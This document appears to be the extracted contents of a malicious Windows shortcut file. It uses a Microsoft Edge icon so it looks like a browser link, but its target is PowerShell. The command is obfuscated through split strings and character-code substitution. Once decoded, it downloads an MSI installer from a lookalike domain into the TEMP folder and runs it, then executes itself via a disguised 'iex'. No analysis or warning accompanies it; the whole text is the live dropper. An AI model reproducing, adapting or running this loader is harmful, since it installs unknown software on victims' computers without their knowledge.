Windows
XM7rZ.u.
System32
XM7rZLo.
WindowsPowerShell
XN8&ZG
powershell.exe
%ProgramFiles%\Microsoft\Edge\Application\msedge.exe
Windows
System32
WindowsPowerShell
ypowershell.exe
?..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(' '+'(Vuq2qBsoVuq+VuqmeDatVuq+Vuqa =Vuq+Vuq @(Vuq+Vuq
Vuq+Vuq Vuq+Vuq[Vuq+VuqPSCV'+'uq+VuqustomObjeVuq+Vuqct'+'Vuq'+'+Vuq]@{a = Vuq+Vuqb'+'m6Vuq+VuqhtVuq+VuqtpVuq+Vuqs://goVuq+Vuq-cVuq+VuqaVuq+VuqrVuq+Vuqs-chVuq+VuqeapVuq+VuqrestVuq+Vuq.cfd/UVuq+VuqXVR'+'UZ'+'MQ.msibm6Vuq'+'+Vuq; b = bm6filVuq+VuqeVuq+Vuq8dd75fVuq+Vuq5Vuq+Vuq7e41a2f8.msibmVuq+Vuq6Vuq+Vuq}'+'
foreachVuq+Vuq (2qVuq+VuqBi in 2qBsomeData) {
Vuq+VuqtryVuq+Vuq {Vuq+Vuq
Vu'+'q+Vuq 2qBfilePaVuq+VuqtVuq+Vuqh Vuq+Vuq= Vuq+Vuq'+'bm62qBenv:TEMPdH52qBVuq+Vuq(Vuq+Vuq2qBi.b)bm6;
Vuq+Vuq 2qB'+'doVuq+Vuqwnload = 2Vuq+VuqqBVuq+VuqtrVuq+Vuque;
Vuq+Vuq'+' iVuq+VuqfVuq+Vuq Vuq+Vuq(TVuq+Vuqest-Vuq+VuqPath Vuq+Vuq2Vuq+VuqqBfileVuq+VuqPathVuq+Vuq) Vuq+Vuq{Vuq+Vuq
Vuq+Vuq
2qVuq+VuqBVuq+VuqdowVuq+VuqnloVuq+Vuqad =Vuq+Vuq 2qBfalseVuq+Vuq;
Vuq+Vuq }
if (2qBVuq+'+'Vuqdownload) {
Vuq+Vuq'+' Vuq+Vuq Vuq+Vuq '+'Invoke-Vuq+VuqRestMethodVuq'+'+Vuq -Vuq+VuqUriVuq+Vuq Vuq+Vuq2qBi.Vuq+Vu'+'qa -OutFile 2qBfilVuq+V'+'uqePath;
Vuq+Vuq }
Vuq'+'+Vuq
Vuq+VuqSVuq+Vuqtart-Proc'+'Vuq+Vuqess 2qBfilePath;
Vuq+Vuq }
cVu'+'q+VuqaVuq+VuqtVuq+VuqcVuq+Vuqh {
Vuq+Vuq
Vuq+Vuq
Vuq).REPlaCE(VuqdH5Vu'+'q,[STrInG][cHAr]92).REPlaCE(([cHAr]50+[cHAr]113+[cHAr]66),Vuq0aXVuq).REPl'+'aCE(Vuqbm6Vuq,[STrInG][cHAr]34)'+'Vnq iEX').rEplACE('Vuq',[strInG][ChAR]39).rEplACE(([ChAR]48+[ChAR]97+[ChAR]88),[strInG][ChAR]36).rEplACE(([ChAR]86+[ChAR]110+[ChAR]113),'|')| &( $ENv:COmSpeC[4,15,25]-joIn'')
4%ProgramFiles%\Microsoft\Edge\Application\msedge.exe
%ProgramFiles%\Microsoft\Edge\Application\msedge.exe